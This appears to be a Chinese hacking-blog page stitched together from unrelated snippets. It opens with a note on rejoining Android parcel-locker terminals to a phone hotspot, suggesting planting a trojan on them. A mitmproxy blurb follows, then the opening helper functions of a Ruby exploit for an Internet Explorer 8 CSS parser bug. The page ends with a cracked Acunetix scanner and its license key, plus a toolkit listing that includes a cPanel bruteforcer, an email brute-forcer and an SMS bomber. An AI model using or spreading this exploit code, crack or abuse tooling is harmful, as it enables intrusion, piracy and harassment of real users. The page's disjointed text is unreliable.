之前银行的各种atm机基本都是windows xp,现在各种终端设备基本都是安卓。当然,为了方便维护肯定会留一些特殊的设置或者后门来方便维护啊。之所以研究这个东西是因为,之前这个破设备老是断网,取不出快递来。于是想着怎么重新联网,于是折腾了半天发现可以连自己手机热点恢复网络,所以这个东西自然也可以干其他的事情啊,比如ip+1(再比如,装个木马~~)。
新式钓鱼【systemup.org】
mitmproxy
mitmproxy是一款支持SSL的HTTP代理,它可以用于调试HTTP通信,发起中间人攻击等。mitmproxy提供了一个控制台接口用于动态拦 截和编辑HTTP数据包。mitmdump是mitmproxy的命令行版本,功能与其相同。
link:http://www.mitmproxy.org/
mitmproxy的主要特点:
Intercept and modify HTTP traffic on the fly
Save HTTP conversations for later replay and analysis
Replay both HTTP clients and servers
Make scripted changes to HTTP traffic using Python
SSL interception certs generated on the fly
Internet Explorer 8 CSS Parser Exploit Code
#!/usr/bin/env ruby
# Source: http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
# Author: Nephi Johnson (d0c_s4vage)
require 'socket'
def http_send(sock, data, opts={})
defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}
opts = defaults.merge(opts)
code = opts[:code]
message = opts[:message]
type = opts[:type]
to_send = "HTTP/1.1 #{code} #{message}\r\n" +
"Date: Sat, 11 Dec 2010 14:20:23 GMT\r\n" +
"Cache-Control: no-cache\r\n" +
"Content-Type: #{type}\r\n" +
"Pragma: no-cache\r\n" +
"Content-Length: #{data.length}\r\n\r\n" +
"#{data}"
puts "[+] Sending:"
to_send.split("\n").each do |line|
puts " #{line}"
end
sock.write(to_send) rescue return false
return true
end
def sock_read(sock, out_str, timeout=5)
begin
if Kernel.select([sock],[],[],timeout)
out_str.replace(sock.recv(1024))
puts "[+] Received:"
out_str.split("\n").each do |line|
puts " #{line}"
end
else
sock.close
return false
end
rescue Exception => ex
return false
end
end
def to_uni(str)
res = ""
str.each_byte do |b|
res < < "\x00#{b.chr}"
end
res
end
Acunetix Web Vulnerability Scanner Enterprise Edition 6.5 Cracked
Click here to download this file.License Key: 9e3b81483d2s59ac60d4e97fd54f7d80【非原创破解】
Reiluke tools(include SQlIhelper 2.7)
File List:
2009-02-12 09:33 <DIR> admin finder
2009-02-16 10:25 <DIR> blind Sqli
2009-02-12 10:03 <DIR> cpanel bruteforcer
2009-02-12 09:53 <DIR> duplicate remover
2009-02-12 09:52 <DIR> email brute
2009-02-16 10:25 <DIR> email checker
2009-02-12 10:01 <DIR> exploit scanner
2009-02-12 10:04 <DIR> php rapidshare checker
2009-02-12 09:57 <DIR> rapidshare checker
2009-02-12 09:36 <DIR> sms bomber
2009-02-12 09:54 <DIR> sqli column counter
2009-09-01 10:50 <DIR> sqliHelper 2.7
2009-02-12 10:02 <DIR> steam checker